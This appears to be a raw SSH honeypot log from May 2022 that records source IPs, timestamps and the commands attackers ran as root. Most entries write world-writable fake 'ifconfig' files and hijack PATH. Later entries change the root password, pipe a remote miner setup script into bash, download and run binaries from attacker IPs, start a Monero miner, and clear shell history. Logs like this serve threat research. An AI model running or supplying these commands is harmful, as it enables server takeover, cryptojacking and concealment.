ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 150.107.95.20 18-May-2022 05:26:53 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 104.152.244.81 18-May-2022 05:29:10 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 104.152.244.81 18-May-2022 05:29:21 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 2.197.115.147 18-May-2022 05:40:05 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 13.87.67.199 18-May-2022 05:45:49 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 81.38.12.60 18-May-2022 05:58:13 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig From 124.126.137.38 18-May-2022 05:58:13 ssh2 root cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 31.223.111.253 18-May-2022 06:04:46 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 64.98.86.50 18-May-2022 06:06:22 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 150.107.95.20 18-May-2022 06:19:15 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 210.73.221.78 18-May-2022 06:20:10 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 112.167.233.14 18-May-2022 06:21:07 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 121.200.53.148 18-May-2022 06:25:29 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 115.45.64.175 18-May-2022 06:29:38 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 143.244.138.59 18-May-2022 06:29:44 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 39.175.68.100 18-May-2022 06:29:52 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 143.244.138.59 18-May-2022 06:29:59 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 85.105.58.118 18-May-2022 06:30:29 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 1.220.98.197 18-May-2022 06:32:51 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 59.3.186.45 18-May-2022 06:38:55 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 124.223.208.121 18-May-2022 06:39:06 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 64.98.86.50 18-May-2022 06:40:05 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 222.134.240.92 18-May-2022 06:44:00 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 222.134.240.92 18-May-2022 06:45:01 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 38.75.229.170 18-May-2022 06:48:44 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 120.224.34.31 18-May-2022 06:51:06 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 222.187.196.26 18-May-2022 07:21:01 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 144.24.197.160 18-May-2022 07:25:01 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 103.105.12.48 18-May-2022 08:00:41 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 117.16.44.111 18-May-2022 08:27:08 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 171.231.23.168 18-May-2022 08:37:40 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 179.43.142.180 18-May-2022 23:48:02 ssh2 root Exec echo root:dgtij24jti3u3ji4rg69420g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij24jti3u3ji4rg69420g|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 209.141.62.223 19-May-2022 13:00:02 ssh2 root Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.62.223/krn.tar || curl -o krn.tar http://209.141.62.223/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456 cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://209.141.62.223/krn.tar || curl -o krn.tar http://209.141.62.223/krn.tar tar -xf krn.tar cd krn chmod +x * ./sshd ./krane 123456 From 139.99.131.116 19-May-2022 13:38:00 ssh2 root Exec d /tmp ; rm -rf ok.sh wget 156.38.209.136/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 156.38.209.136/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 156.38.209.136/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history d /tmp rm -rf ok.sh wget 156.38.209.136/ok.sh sh ok.sh rm -rf ok.sh curl -O 156.38.209.136/ok.sh sh ok.sh rm -rf ok.sh history -c wget 156.38.209.136/cnrig chmod 777 cnrig ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 157.230.19.122 19-May-2022 14:09:05 ssh2 root Exec nproc;nvidia-smi --list-gpus nproc nvidia-smi --list-gpus From 62.197.136.83 19-May-2022 23:57:22 ssh2 root Exec wget 45.61.184.4/x86_64; chmod 777 x86_64; ./x86_64 wns.x86 wget 45.61.184.4/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 From 179.43.142.180 20-May-2022 18:14:01 ssh2 root Exec echo root:dgtij26jti5u5ji6rg755431|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij26jti5u5ji6rg755431|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 179.43.142.180 20-May-2022 22:55:18 ssh2 root Exec echo root:dgtij26jti5u5ji6rg755431|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij26jti5u5ji6rg755431|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 77.28.90.54 20-May-2022 23:01:22 ssh2 root w ls -a ps x lscpu uname -a nproc clear clear l -a ps x cd /home l -a ls -a ps x w arp -a sh ls -a bash ls -a ps x gcc ps x cat /etc/paswd cat /etc/passwd ls -a cd /home ls -a cd ls -a id w ls sudo -i su - root apt-get apt-get install screen udo sudo apt-get install sudo w sudo -i ls -a sudo sh bash ps x id w From 77.28.90.54 20-May-2022 23:03:03 ssh2 root Exec test -x /usr/lib/sftp-server && exec /usr/lib/sftp-server test -x /usr/local/lib/sftp-server && exec /usr/local/lib/sftp-server exec sftp-server test -x /usr/lib/sftp-server exec /usr/lib/sftp-server test -x /usr/local/lib/sftp-server exec /usr/local/lib/sftp-server exec sftp-server From 77.28.90.54 20-May-2022 23:03:21 ssh2 root python curl apt apt-get update apt-get update apt-get upgrade sh From 179.43.142.180 20-May-2022 23:26:31 ssh2 root Exec echo root:dgtij26jti5u5ji6rgg755431|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA 